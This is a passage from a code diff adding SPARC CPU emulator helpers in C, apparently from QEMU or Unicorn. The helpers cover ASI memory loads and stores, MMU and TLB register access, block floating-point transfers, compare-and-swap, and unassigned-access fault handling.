2: + ret = bswap16(ret); + break; + case 4: + ret = bswap32(ret); + break; + case 8: + ret = bswap64(ret); + break; + default: + break; + } + default: + break; + } + + /* Convert to signed number */ + if (sign) { + switch (size) { + case 1: + ret = (int8_t) ret; + break; + case 2: + ret = (int16_t) ret; + break; + case 4: + ret = (int32_t) ret; + break; + default: + break; + } + } +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return ret; +} + +void helper_st_asi(CPUSPARCState *env, target_ulong addr, target_ulong val, + int asi, int size) +{ +#ifdef DEBUG_ASI + dump_asi("write", addr, asi, size, val); +#endif + if (asi < 0x80) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + helper_check_align(env, addr, size - 1); + addr = asi_address_mask(env, asi, addr); + + /* Convert to little endian */ + switch (asi) { + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + switch (size) { + case 2: + val = bswap16(val); + break; + case 4: + val = bswap32(val); + break; + case 8: + val = bswap64(val); + break; + default: + break; + } + default: + break; + } + + switch (asi) { + case 0x80: /* Primary */ + case 0x88: /* Primary LE */ + { + switch (size) { + case 1: + stb_raw(addr, val); + break; + case 2: + stw_raw(addr, val); + break; + case 4: + stl_raw(addr, val); + break; + case 8: + default: + stq_raw(addr, val); + break; + } + } + break; + case 0x81: /* Secondary */ + case 0x89: /* Secondary LE */ + /* XXX */ + return; + + case 0x82: /* Primary no-fault, RO */ + case 0x83: /* Secondary no-fault, RO */ + case 0x8a: /* Primary no-fault LE, RO */ + case 0x8b: /* Secondary no-fault LE, RO */ + default: + helper_raise_exception(env, TT_DATA_ACCESS); + return; + } +} + +#else /* CONFIG_USER_ONLY */ + +uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int sign) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + uint64_t ret = 0; +#if defined(DEBUG_ASI) + target_ulong last_addr = addr; +#endif + + asi &= 0xff; + + if ((asi < 0x80 && (env->pstate & PS_PRIV) == 0) + || (cpu_has_hypervisor(env) + && asi >= 0x30 && asi < 0x80 + && !(env->hpstate & HS_PRIV))) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + helper_check_align(env, addr, size - 1); + addr = asi_address_mask(env, asi, addr); + + /* process nonfaulting loads first */ + if ((asi & 0xf6) == 0x82) { + int mmu_idx; + + /* secondary space access has lowest asi bit equal to 1 */ + if (env->pstate & PS_PRIV) { + mmu_idx = (asi & 1) ? MMU_KERNEL_SECONDARY_IDX : MMU_KERNEL_IDX; + } else { + mmu_idx = (asi & 1) ? MMU_USER_SECONDARY_IDX : MMU_USER_IDX; + } + + if (cpu_get_phys_page_nofault(env, addr, mmu_idx) == (0-1ULL)) { +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + /* env->exception_index is set in get_physical_address_data(). */ + helper_raise_exception(env, cs->exception_index); + } + + /* convert nonfaulting load ASIs to normal load ASIs */ + asi &= ~0x02; + } + + switch (asi) { + case 0x10: /* As if user primary */ + case 0x11: /* As if user secondary */ + case 0x18: /* As if user primary LE */ + case 0x19: /* As if user secondary LE */ + case 0x80: /* Primary */ + case 0x81: /* Secondary */ + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + case 0xe2: /* UA2007 Primary block init */ + case 0xe3: /* UA2007 Secondary block init */ + if ((asi & 0x80) && (env->pstate & PS_PRIV)) { + if (cpu_hypervisor_mode(env)) { + switch (size) { + case 1: + ret = cpu_ldub_hypv(env, addr); + break; + case 2: + ret = cpu_lduw_hypv(env, addr); + break; + case 4: + ret = cpu_ldl_hypv(env, addr); + break; + default: + case 8: + ret = cpu_ldq_hypv(env, addr); + break; + } + } else { + /* secondary space access has lowest asi bit equal to 1 */ + if (asi & 1) { + switch (size) { + case 1: + ret = cpu_ldub_kernel_secondary(env, addr); + break; + case 2: + ret = cpu_lduw_kernel_secondary(env, addr); + break; + case 4: + ret = cpu_ldl_kernel_secondary(env, addr); + break; + default: + case 8: + ret = cpu_ldq_kernel_secondary(env, addr); + break; + } + } else { + switch (size) { + case 1: + ret = cpu_ldub_kernel(env, addr); + break; + case 2: + ret = cpu_lduw_kernel(env, addr); + break; + case 4: + ret = cpu_ldl_kernel(env, addr); + break; + default: + case 8: + ret = cpu_ldq_kernel(env, addr); + break; + } + } + } + } else { + /* secondary space access has lowest asi bit equal to 1 */ + if (asi & 1) { + switch (size) { + case 1: + ret = cpu_ldub_user_secondary(env, addr); + break; + case 2: + ret = cpu_lduw_user_secondary(env, addr); + break; + case 4: + ret = cpu_ldl_user_secondary(env, addr); + break; + default: + case 8: + ret = cpu_ldq_user_secondary(env, addr); + break; + } + } else { + switch (size) { + case 1: + ret = cpu_ldub_user(env, addr); + break; + case 2: + ret = cpu_lduw_user(env, addr); + break; + case 4: + ret = cpu_ldl_user(env, addr); + break; + default: + case 8: + ret = cpu_ldq_user(env, addr); + break; + } + } + } + break; + case 0x14: /* Bypass */ + case 0x15: /* Bypass, non-cacheable */ + case 0x1c: /* Bypass LE */ + case 0x1d: /* Bypass, non-cacheable LE */ + { + switch (size) { + case 1: + ret = ldub_phys(cs->as, addr); + break; + case 2: + ret = lduw_phys(cs->as, addr); + break; + case 4: + ret = ldl_phys(cs->as, addr); + break; + default: + case 8: + ret = ldq_phys(cs->as, addr); + break; + } + break; + } + case 0x24: /* Nucleus quad LDD 128 bit atomic */ + case 0x2c: /* Nucleus quad LDD 128 bit atomic LE + Only ldda allowed */ + helper_raise_exception(env, TT_ILL_INSN); + return 0; + case 0x04: /* Nucleus */ + case 0x0c: /* Nucleus Little Endian (LE) */ + { + switch (size) { + case 1: + ret = cpu_ldub_nucleus(env, addr); + break; + case 2: + ret = cpu_lduw_nucleus(env, addr); + break; + case 4: + ret = cpu_ldl_nucleus(env, addr); + break; + default: + case 8: + ret = cpu_ldq_nucleus(env, addr); + break; + } + break; + } + case 0x4a: /* UPA config */ + /* XXX */ + break; + case 0x45: /* LSU */ + ret = env->lsu; + break; + case 0x50: /* I-MMU regs */ + { + int reg = (addr >> 3) & 0xf; + + if (reg == 0) { + /* I-TSB Tag Target register */ + ret = ultrasparc_tag_target(env->immu.tag_access); + } else { + ret = env->immuregs[reg]; + } + + break; + } + case 0x51: /* I-MMU 8k TSB pointer */ + { + /* env->immuregs[5] holds I-MMU TSB register value + env->immuregs[6] holds I-MMU Tag Access register value */ + ret = ultrasparc_tsb_pointer(env->immu.tsb, env->immu.tag_access, + 8*1024); + break; + } + case 0x52: /* I-MMU 64k TSB pointer */ + { + /* env->immuregs[5] holds I-MMU TSB register value + env->immuregs[6] holds I-MMU Tag Access register value */ + ret = ultrasparc_tsb_pointer(env->immu.tsb, env->immu.tag_access, + 64*1024); + break; + } + case 0x55: /* I-MMU data access */ + { + int reg = (addr >> 3) & 0x3f; + + ret = env->itlb[reg].tte; + break; + } + case 0x56: /* I-MMU tag read */ + { + int reg = (addr >> 3) & 0x3f; + + ret = env->itlb[reg].tag; + break; + } + case 0x58: /* D-MMU regs */ + { + int reg = (addr >> 3) & 0xf; + + if (reg == 0) { + /* D-TSB Tag Target register */ + ret = ultrasparc_tag_target(env->dmmu.tag_access); + } else { + ret = env->dmmuregs[reg]; + } + break; + } + case 0x59: /* D-MMU 8k TSB pointer */ + { + /* env->dmmuregs[5] holds D-MMU TSB register value + env->dmmuregs[6] holds D-MMU Tag Access register value */ + ret = ultrasparc_tsb_pointer(env->dmmu.tsb, env->dmmu.tag_access, + 8*1024); + break; + } + case 0x5a: /* D-MMU 64k TSB pointer */ + { + /* env->dmmuregs[5] holds D-MMU TSB register value + env->dmmuregs[6] holds D-MMU Tag Access register value */ + ret = ultrasparc_tsb_pointer(env->dmmu.tsb, env->dmmu.tag_access, + 64*1024); + break; + } + case 0x5d: /* D-MMU data access */ + { + int reg = (addr >> 3) & 0x3f; + + ret = env->dtlb[reg].tte; + break; + } + case 0x5e: /* D-MMU tag read */ + { + int reg = (addr >> 3) & 0x3f; + + ret = env->dtlb[reg].tag; + break; + } + case 0x48: /* Interrupt dispatch, RO */ + break; + case 0x49: /* Interrupt data receive */ + ret = env->ivec_status; + break; + case 0x7f: /* Incoming interrupt vector, RO */ + { + int reg = (addr >> 4) & 0x3; + if (reg < 3) { + ret = env->ivec_data[reg]; + } + break; + } + case 0x46: /* D-cache data */ + case 0x47: /* D-cache tag access */ + case 0x4b: /* E-cache error enable */ + case 0x4c: /* E-cache asynchronous fault status */ + case 0x4d: /* E-cache asynchronous fault address */ + case 0x4e: /* E-cache tag data */ + case 0x66: /* I-cache instruction access */ + case 0x67: /* I-cache tag access */ + case 0x6e: /* I-cache predecode */ + case 0x6f: /* I-cache LRU etc. */ + case 0x76: /* E-cache tag */ + case 0x7e: /* E-cache tag */ + break; + case 0x5b: /* D-MMU data pointer */ + case 0x54: /* I-MMU data in, WO */ + case 0x57: /* I-MMU demap, WO */ + case 0x5c: /* D-MMU data in, WO */ + case 0x5f: /* D-MMU demap, WO */ + case 0x77: /* Interrupt vector, WO */ + default: + cpu_unassigned_access(cs, addr, false, false, 1, size); + ret = 0; + break; + } + + /* Convert from little endian */ + switch (asi) { + case 0x0c: /* Nucleus Little Endian (LE) */ + case 0x18: /* As if user primary LE */ + case 0x19: /* As if user secondary LE */ + case 0x1c: /* Bypass LE */ + case 0x1d: /* Bypass, non-cacheable LE */ + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + switch(size) { + case 2: + ret = bswap16(ret); + break; + case 4: + ret = bswap32(ret); + break; + case 8: + ret = bswap64(ret); + break; + default: + break; + } + default: + break; + } + + /* Convert to signed number */ + if (sign) { + switch (size) { + case 1: + ret = (int8_t) ret; + break; + case 2: + ret = (int16_t) ret; + break; + case 4: + ret = (int32_t) ret; + break; + default: + break; + } + } +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return ret; +} + +void helper_st_asi(CPUSPARCState *env, target_ulong addr, target_ulong val, + int asi, int size) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + CPUState *cs = CPU(cpu); + +#ifdef DEBUG_ASI + dump_asi("write", addr, asi, size, val); +#endif + + asi &= 0xff; + + if ((asi < 0x80 && (env->pstate & PS_PRIV) == 0) + || (cpu_has_hypervisor(env) + && asi >= 0x30 && asi < 0x80 + && !(env->hpstate & HS_PRIV))) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + helper_check_align(env, addr, size - 1); + addr = asi_address_mask(env, asi, addr); + + /* Convert to little endian */ + switch (asi) { + case 0x0c: /* Nucleus Little Endian (LE) */ + case 0x18: /* As if user primary LE */ + case 0x19: /* As if user secondary LE */ + case 0x1c: /* Bypass LE */ + case 0x1d: /* Bypass, non-cacheable LE */ + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + switch (size) { + case 2: + val = bswap16(val); + break; + case 4: + val = bswap32(val); + break; + case 8: + val = bswap64(val); + break; + default: + break; + } + default: + break; + } + + switch (asi) { + case 0x10: /* As if user primary */ + case 0x11: /* As if user secondary */ + case 0x18: /* As if user primary LE */ + case 0x19: /* As if user secondary LE */ + case 0x80: /* Primary */ + case 0x81: /* Secondary */ + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + case 0xe2: /* UA2007 Primary block init */ + case 0xe3: /* UA2007 Secondary block init */ + if ((asi & 0x80) && (env->pstate & PS_PRIV)) { + if (cpu_hypervisor_mode(env)) { + switch (size) { + case 1: + cpu_stb_hypv(env, addr, val); + break; + case 2: + cpu_stw_hypv(env, addr, val); + break; + case 4: + cpu_stl_hypv(env, addr, val); + break; + case 8: + default: + cpu_stq_hypv(env, addr, val); + break; + } + } else { + /* secondary space access has lowest asi bit equal to 1 */ + if (asi & 1) { + switch (size) { + case 1: + cpu_stb_kernel_secondary(env, addr, val); + break; + case 2: + cpu_stw_kernel_secondary(env, addr, val); + break; + case 4: + cpu_stl_kernel_secondary(env, addr, val); + break; + case 8: + default: + cpu_stq_kernel_secondary(env, addr, val); + break; + } + } else { + switch (size) { + case 1: + cpu_stb_kernel(env, addr, val); + break; + case 2: + cpu_stw_kernel(env, addr, val); + break; + case 4: + cpu_stl_kernel(env, addr, val); + break; + case 8: + default: + cpu_stq_kernel(env, addr, val); + break; + } + } + } + } else { + /* secondary space access has lowest asi bit equal to 1 */ + if (asi & 1) { + switch (size) { + case 1: + cpu_stb_user_secondary(env, addr, val); + break; + case 2: + cpu_stw_user_secondary(env, addr, val); + break; + case 4: + cpu_stl_user_secondary(env, addr, val); + break; + case 8: + default: + cpu_stq_user_secondary(env, addr, val); + break; + } + } else { + switch (size) { + case 1: + cpu_stb_user(env, addr, val); + break; + case 2: + cpu_stw_user(env, addr, val); + break; + case 4: + cpu_stl_user(env, addr, val); + break; + case 8: + default: + cpu_stq_user(env, addr, val); + break; + } + } + } + break; + case 0x14: /* Bypass */ + case 0x15: /* Bypass, non-cacheable */ + case 0x1c: /* Bypass LE */ + case 0x1d: /* Bypass, non-cacheable LE */ + { + switch (size) { + case 1: + stb_phys(cs->as, addr, val); + break; + case 2: + stw_phys(cs->as, addr, val); + break; + case 4: + stl_phys(cs->as, addr, val); + break; + case 8: + default: + stq_phys(cs->as, addr, val); + break; + } + } + return; + case 0x24: /* Nucleus quad LDD 128 bit atomic */ + case 0x2c: /* Nucleus quad LDD 128 bit atomic LE + Only ldda allowed */ + helper_raise_exception(env, TT_ILL_INSN); + return; + case 0x04: /* Nucleus */ + case 0x0c: /* Nucleus Little Endian (LE) */ + { + switch (size) { + case 1: + cpu_stb_nucleus(env, addr, val); + break; + case 2: + cpu_stw_nucleus(env, addr, val); + break; + case 4: + cpu_stl_nucleus(env, addr, val); + break; + default: + case 8: + cpu_stq_nucleus(env, addr, val); + break; + } + break; + } + + case 0x4a: /* UPA config */ + /* XXX */ + return; + case 0x45: /* LSU */ + { + uint64_t oldreg; + + oldreg = env->lsu; + env->lsu = val & (DMMU_E | IMMU_E); + /* Mappings generated during D/I MMU disabled mode are + invalid in normal mode */ + if (oldreg != env->lsu) { + DPRINTF_MMU("LSU change: 0x%" PRIx64 " -> 0x%" PRIx64 "\n", + oldreg, env->lsu); +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + tlb_flush(CPU(cpu), 1); + } + return; + } + case 0x50: /* I-MMU regs */ + { + int reg = (addr >> 3) & 0xf; + uint64_t oldreg; + + oldreg = env->immuregs[reg]; + switch (reg) { + case 0: /* RO */ + return; + case 1: /* Not in I-MMU */ + case 2: + return; + case 3: /* SFSR */ + if ((val & 1) == 0) { + val = 0; /* Clear SFSR */ + } + env->immu.sfsr = val; + break; + case 4: /* RO */ + return; + case 5: /* TSB access */ + DPRINTF_MMU("immu TSB write: 0x%016" PRIx64 " -> 0x%016" + PRIx64 "\n", env->immu.tsb, val); + env->immu.tsb = val; + break; + case 6: /* Tag access */ + env->immu.tag_access = val; + break; + case 7: + case 8: + return; + default: + break; + } + + if (oldreg != env->immuregs[reg]) { + DPRINTF_MMU("immu change reg[%d]: 0x%016" PRIx64 " -> 0x%016" + PRIx64 "\n", reg, oldreg, env->immuregs[reg]); + } +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + return; + } + case 0x54: /* I-MMU data in */ + replace_tlb_1bit_lru(env->itlb, env->immu.tag_access, val, "immu", env); + return; + case 0x55: /* I-MMU data access */ + { + /* TODO: auto demap */ + + unsigned int i = (addr >> 3) & 0x3f; + + replace_tlb_entry(&env->itlb[i], env->immu.tag_access, val, env); + +#ifdef DEBUG_MMU + DPRINTF_MMU("immu data access replaced entry [%i]\n", i); + dump_mmu(stdout, fprintf, env); +#endif + return; + } + case 0x57: /* I-MMU demap */ + demap_tlb(env->itlb, addr, "immu", env); + return; + case 0x58: /* D-MMU regs */ + { + int reg = (addr >> 3) & 0xf; + uint64_t oldreg; + + oldreg = env->dmmuregs[reg]; + switch (reg) { + case 0: /* RO */ + case 4: + return; + case 3: /* SFSR */ + if ((val & 1) == 0) { + val = 0; /* Clear SFSR, Fault address */ + env->dmmu.sfar = 0; + } + env->dmmu.sfsr = val; + break; + case 1: /* Primary context */ + env->dmmu.mmu_primary_context = val; + /* can be optimized to only flush MMU_USER_IDX + and MMU_KERNEL_IDX entries */ + tlb_flush(CPU(cpu), 1); + break; + case 2: /* Secondary context */ + env->dmmu.mmu_secondary_context = val; + /* can be optimized to only flush MMU_USER_SECONDARY_IDX + and MMU_KERNEL_SECONDARY_IDX entries */ + tlb_flush(CPU(cpu), 1); + break; + case 5: /* TSB access */ + DPRINTF_MMU("dmmu TSB write: 0x%016" PRIx64 " -> 0x%016" + PRIx64 "\n", env->dmmu.tsb, val); + env->dmmu.tsb = val; + break; + case 6: /* Tag access */ + env->dmmu.tag_access = val; + break; + case 7: /* Virtual Watchpoint */ + case 8: /* Physical Watchpoint */ + default: + env->dmmuregs[reg] = val; + break; + } + + if (oldreg != env->dmmuregs[reg]) { + DPRINTF_MMU("dmmu change reg[%d]: 0x%016" PRIx64 " -> 0x%016" + PRIx64 "\n", reg, oldreg, env->dmmuregs[reg]); + } +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + return; + } + case 0x5c: /* D-MMU data in */ + replace_tlb_1bit_lru(env->dtlb, env->dmmu.tag_access, val, "dmmu", env); + return; + case 0x5d: /* D-MMU data access */ + { + unsigned int i = (addr >> 3) & 0x3f; + + replace_tlb_entry(&env->dtlb[i], env->dmmu.tag_access, val, env); + +#ifdef DEBUG_MMU + DPRINTF_MMU("dmmu data access replaced entry [%i]\n", i); + dump_mmu(stdout, fprintf, env); +#endif + return; + } + case 0x5f: /* D-MMU demap */ + demap_tlb(env->dtlb, addr, "dmmu", env); + return; + case 0x49: /* Interrupt data receive */ + env->ivec_status = val & 0x20; + return; + case 0x46: /* D-cache data */ + case 0x47: /* D-cache tag access */ + case 0x4b: /* E-cache error enable */ + case 0x4c: /* E-cache asynchronous fault status */ + case 0x4d: /* E-cache asynchronous fault address */ + case 0x4e: /* E-cache tag data */ + case 0x66: /* I-cache instruction access */ + case 0x67: /* I-cache tag access */ + case 0x6e: /* I-cache predecode */ + case 0x6f: /* I-cache LRU etc. */ + case 0x76: /* E-cache tag */ + case 0x7e: /* E-cache tag */ + return; + case 0x51: /* I-MMU 8k TSB pointer, RO */ + case 0x52: /* I-MMU 64k TSB pointer, RO */ + case 0x56: /* I-MMU tag read, RO */ + case 0x59: /* D-MMU 8k TSB pointer, RO */ + case 0x5a: /* D-MMU 64k TSB pointer, RO */ + case 0x5b: /* D-MMU data pointer, RO */ + case 0x5e: /* D-MMU tag read, RO */ + case 0x48: /* Interrupt dispatch, RO */ + case 0x7f: /* Incoming interrupt vector, RO */ + case 0x82: /* Primary no-fault, RO */ + case 0x83: /* Secondary no-fault, RO */ + case 0x8a: /* Primary no-fault LE, RO */ + case 0x8b: /* Secondary no-fault LE, RO */ + default: + cpu_unassigned_access(cs, addr, true, false, 1, size); + return; + } +} +#endif /* CONFIG_USER_ONLY */ + +void helper_ldda_asi(CPUSPARCState *env, target_ulong addr, int asi, int rd) +{ + if ((asi < 0x80 && (env->pstate & PS_PRIV) == 0) + || (cpu_has_hypervisor(env) + && asi >= 0x30 && asi < 0x80 + && !(env->hpstate & HS_PRIV))) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + addr = asi_address_mask(env, asi, addr); + + switch (asi) { +#if !defined(CONFIG_USER_ONLY) + case 0x24: /* Nucleus quad LDD 128 bit atomic */ + case 0x2c: /* Nucleus quad LDD 128 bit atomic LE */ + helper_check_align(env, addr, 0xf); + if (rd == 0) { + env->gregs[1] = cpu_ldq_nucleus(env, addr + 8); + if (asi == 0x2c) { + bswap64s(&env->gregs[1]); + } + } else if (rd < 8) { + env->gregs[rd] = cpu_ldq_nucleus(env, addr); + env->gregs[rd + 1] = cpu_ldq_nucleus(env, addr + 8); + if (asi == 0x2c) { + bswap64s(&env->gregs[rd]); + bswap64s(&env->gregs[rd + 1]); + } + } else { + env->regwptr[rd] = cpu_ldq_nucleus(env, addr); + env->regwptr[rd + 1] = cpu_ldq_nucleus(env, addr + 8); + if (asi == 0x2c) { + bswap64s(&env->regwptr[rd]); + bswap64s(&env->regwptr[rd + 1]); + } + } + break; +#endif + default: + helper_check_align(env, addr, 0x3); + if (rd == 0) { + env->gregs[1] = helper_ld_asi(env, addr + 4, asi, 4, 0); + } else if (rd < 8) { + env->gregs[rd] = helper_ld_asi(env, addr, asi, 4, 0); + env->gregs[rd + 1] = helper_ld_asi(env, addr + 4, asi, 4, 0); + } else { + env->regwptr[rd] = helper_ld_asi(env, addr, asi, 4, 0); + env->regwptr[rd + 1] = helper_ld_asi(env, addr + 4, asi, 4, 0); + } + break; + } +} + +void helper_ldf_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int rd) +{ + unsigned int i; + target_ulong val; + + helper_check_align(env, addr, 3); + addr = asi_address_mask(env, asi, addr); + + switch (asi) { + case 0xf0: /* UA2007/JPS1 Block load primary */ + case 0xf1: /* UA2007/JPS1 Block load secondary */ + case 0xf8: /* UA2007/JPS1 Block load primary LE */ + case 0xf9: /* UA2007/JPS1 Block load secondary LE */ + if (rd & 7) { + helper_raise_exception(env, TT_ILL_INSN); + return; + } + helper_check_align(env, addr, 0x3f); + for (i = 0; i < 8; i++, rd += 2, addr += 8) { + env->fpr[rd / 2].ll = helper_ld_asi(env, addr, asi & 0x8f, 8, 0); + } + return; + + case 0x16: /* UA2007 Block load primary, user privilege */ + case 0x17: /* UA2007 Block load secondary, user privilege */ + case 0x1e: /* UA2007 Block load primary LE, user privilege */ + case 0x1f: /* UA2007 Block load secondary LE, user privilege */ + case 0x70: /* JPS1 Block load primary, user privilege */ + case 0x71: /* JPS1 Block load secondary, user privilege */ + case 0x78: /* JPS1 Block load primary LE, user privilege */ + case 0x79: /* JPS1 Block load secondary LE, user privilege */ + if (rd & 7) { + helper_raise_exception(env, TT_ILL_INSN); + return; + } + helper_check_align(env, addr, 0x3f); + for (i = 0; i < 8; i++, rd += 2, addr += 8) { + env->fpr[rd / 2].ll = helper_ld_asi(env, addr, asi & 0x19, 8, 0); + } + return; + + default: + break; + } + + switch (size) { + default: + case 4: + val = helper_ld_asi(env, addr, asi, size, 0); + if (rd & 1) { + env->fpr[rd / 2].l.lower = val; + } else { + env->fpr[rd / 2].l.upper = val; + } + break; + case 8: + env->fpr[rd / 2].ll = helper_ld_asi(env, addr, asi, size, 0); + break; + case 16: + env->fpr[rd / 2].ll = helper_ld_asi(env, addr, asi, 8, 0); + env->fpr[rd / 2 + 1].ll = helper_ld_asi(env, addr + 8, asi, 8, 0); + break; + } +} + +void helper_stf_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int rd) +{ + unsigned int i; + target_ulong val; + + addr = asi_address_mask(env, asi, addr); + + switch (asi) { + case 0xe0: /* UA2007/JPS1 Block commit store primary (cache flush) */ + case 0xe1: /* UA2007/JPS1 Block commit store secondary (cache flush) */ + case 0xf0: /* UA2007/JPS1 Block store primary */ + case 0xf1: /* UA2007/JPS1 Block store secondary */ + case 0xf8: /* UA2007/JPS1 Block store primary LE */ + case 0xf9: /* UA2007/JPS1 Block store secondary LE */ + if (rd & 7) { + helper_raise_exception(env, TT_ILL_INSN); + return; + } + helper_check_align(env, addr, 0x3f); + for (i = 0; i < 8; i++, rd += 2, addr += 8) { + helper_st_asi(env, addr, env->fpr[rd / 2].ll, asi & 0x8f, 8); + } + + return; + case 0x16: /* UA2007 Block load primary, user privilege */ + case 0x17: /* UA2007 Block load secondary, user privilege */ + case 0x1e: /* UA2007 Block load primary LE, user privilege */ + case 0x1f: /* UA2007 Block load secondary LE, user privilege */ + case 0x70: /* JPS1 Block store primary, user privilege */ + case 0x71: /* JPS1 Block store secondary, user privilege */ + case 0x78: /* JPS1 Block load primary LE, user privilege */ + case 0x79: /* JPS1 Block load secondary LE, user privilege */ + if (rd & 7) { + helper_raise_exception(env, TT_ILL_INSN); + return; + } + helper_check_align(env, addr, 0x3f); + for (i = 0; i < 8; i++, rd += 2, addr += 8) { + helper_st_asi(env, addr, env->fpr[rd / 2].ll, asi & 0x19, 8); + } + + return; + case 0xd2: /* 16-bit floating point load primary */ + case 0xd3: /* 16-bit floating point load secondary */ + case 0xda: /* 16-bit floating point load primary, LE */ + case 0xdb: /* 16-bit floating point load secondary, LE */ + helper_check_align(env, addr, 1); + /* Fall through */ + case 0xd0: /* 8-bit floating point load primary */ + case 0xd1: /* 8-bit floating point load secondary */ + case 0xd8: /* 8-bit floating point load primary, LE */ + case 0xd9: /* 8-bit floating point load secondary, LE */ + val = env->fpr[rd / 2].l.lower; + helper_st_asi(env, addr, val, asi & 0x8d, ((asi & 2) >> 1) + 1); + return; + default: + helper_check_align(env, addr, 3); + break; + } + + switch (size) { + default: + case 4: + if (rd & 1) { + val = env->fpr[rd / 2].l.lower; + } else { + val = env->fpr[rd / 2].l.upper; + } + helper_st_asi(env, addr, val, asi, size); + break; + case 8: + helper_st_asi(env, addr, env->fpr[rd / 2].ll, asi, size); + break; + case 16: + helper_st_asi(env, addr, env->fpr[rd / 2].ll, asi, 8); + helper_st_asi(env, addr + 8, env->fpr[rd / 2 + 1].ll, asi, 8); + break; + } +} + +target_ulong helper_casx_asi(CPUSPARCState *env, target_ulong addr, + target_ulong val1, target_ulong val2, + uint32_t asi) +{ + target_ulong ret; + + ret = helper_ld_asi(env, addr, asi, 8, 0); + if (val2 == ret) { + helper_st_asi(env, addr, val1, asi, 8); + } + return ret; +} +#endif /* TARGET_SPARC64 */ + +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) +target_ulong helper_cas_asi(CPUSPARCState *env, target_ulong addr, + target_ulong val1, target_ulong val2, uint32_t asi) +{ + target_ulong ret; + + val2 &= 0xffffffffUL; + ret = helper_ld_asi(env, addr, asi, 4, 0); + ret &= 0xffffffffUL; + if (val2 == ret) { + helper_st_asi(env, addr, val1 & 0xffffffffUL, asi, 4); + } + return ret; +} +#endif /* !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) */ + +void helper_ldqf(CPUSPARCState *env, target_ulong addr, int mem_idx) +{ + /* XXX add 128 bit load */ + CPU_QuadU u; + + helper_check_align(env, addr, 7); +#if !defined(CONFIG_USER_ONLY) + switch (mem_idx) { + case MMU_USER_IDX: + u.ll.upper = cpu_ldq_user(env, addr); + u.ll.lower = cpu_ldq_user(env, addr + 8); + QT0 = u.q; + break; + case MMU_KERNEL_IDX: + u.ll.upper = cpu_ldq_kernel(env, addr); + u.ll.lower = cpu_ldq_kernel(env, addr + 8); + QT0 = u.q; + break; +#ifdef TARGET_SPARC64 + case MMU_HYPV_IDX: + u.ll.upper = cpu_ldq_hypv(env, addr); + u.ll.lower = cpu_ldq_hypv(env, addr + 8); + QT0 = u.q; + break; +#endif + default: + DPRINTF_MMU("helper_ldqf: need to check MMU idx %d\n", mem_idx); + break; + } +#else + u.ll.upper = ldq_raw(address_mask(env, addr)); + u.ll.lower = ldq_raw(address_mask(env, addr + 8)); + QT0 = u.q; +#endif +} + +void helper_stqf(CPUSPARCState *env, target_ulong addr, int mem_idx) +{ + /* XXX add 128 bit store */ + CPU_QuadU u; + + helper_check_align(env, addr, 7); +#if !defined(CONFIG_USER_ONLY) + switch (mem_idx) { + case MMU_USER_IDX: + u.q = QT0; + cpu_stq_user(env, addr, u.ll.upper); + cpu_stq_user(env, addr + 8, u.ll.lower); + break; + case MMU_KERNEL_IDX: + u.q = QT0; + cpu_stq_kernel(env, addr, u.ll.upper); + cpu_stq_kernel(env, addr + 8, u.ll.lower); + break; +#ifdef TARGET_SPARC64 + case MMU_HYPV_IDX: + u.q = QT0; + cpu_stq_hypv(env, addr, u.ll.upper); + cpu_stq_hypv(env, addr + 8, u.ll.lower); + break; +#endif + default: + DPRINTF_MMU("helper_stqf: need to check MMU idx %d\n", mem_idx); + break; + } +#else + u.q = QT0; + stq_raw(address_mask(env, addr), u.ll.upper); + stq_raw(address_mask(env, addr + 8), u.ll.lower); +#endif +} + +#if !defined(CONFIG_USER_ONLY) +#ifndef TARGET_SPARC64 +void sparc_cpu_unassigned_access(CPUState *cs, hwaddr addr, + bool is_write, bool is_exec, int is_asi, + unsigned size) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + int fault_type; + +#ifdef DEBUG_UNASSIGNED + if (is_asi) { + printf("Unassigned mem %s access of %d byte%s to " TARGET_FMT_plx + " asi 0x%02x from " TARGET_FMT_lx "\n", + is_exec ? "exec" : is_write ? "write" : "read", size, + size == 1 ? "" : "s", addr, is_asi, env->pc); + } else { + printf("Unassigned mem %s access of %d byte%s to " TARGET_FMT_plx + " from " TARGET_FMT_lx "\n", + is_exec ? "exec" : is_write ? "write" : "read", size, + size == 1 ? "" : "s", addr, env->pc); + } +#endif + /* Don't overwrite translation and access faults */ + fault_type = (env->mmuregs[3] & 0x1c) >> 2; + if ((fault_type > 4) || (fault_type == 0)) { + env->mmuregs[3] = 0; /* Fault status register */ + if (is_asi) { + env->mmuregs[3] |= 1 << 16; + } + if (env->psrs) { + env->mmuregs[3] |= 1 << 5; + } + if (is_exec) { + env->mmuregs[3] |= 1 << 6; + } + if (is_write) { + env->mmuregs[3] |= 1 << 7; + } + env->mmuregs[3] |= (5 << 2) | 2; + /* SuperSPARC will never place instruction fault addresses in the FAR */ + if (!is_exec) { + env->mmuregs[4] = addr; /* Fault address register */ + } + } + /* overflow (same type fault was not read before another fault) */ + if (fault_type == ((env->mmuregs[3] & 0x1c)) >> 2) { + env->mmuregs[3] |= 1; + } + + if ((env->mmuregs[0] & MMU_E) && !(env->mmuregs[0] & MMU_NF)) { + if (is_exec) { + 